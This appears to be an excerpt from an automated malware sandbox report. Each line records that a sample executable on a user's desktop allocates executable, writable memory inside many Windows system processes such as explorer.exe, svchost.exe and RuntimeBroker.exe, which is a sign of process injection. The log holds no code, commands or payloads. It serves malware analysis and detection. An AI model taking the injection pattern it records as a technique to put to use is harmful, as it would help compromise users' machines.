        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 710000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3110000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 130000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 340000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 720000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 380000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 940000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 140000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 350000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 730000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 390000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 950000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3250000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 150000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 410000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 940000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 740000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 630000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 940000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 960000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 33C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 420000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 950000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 750000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 640000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 950000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 970000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 33F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 170000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 430000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 960000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 380000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 760000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 650000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 960000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DB0000 protect: page execute and read and writeJump to behavior
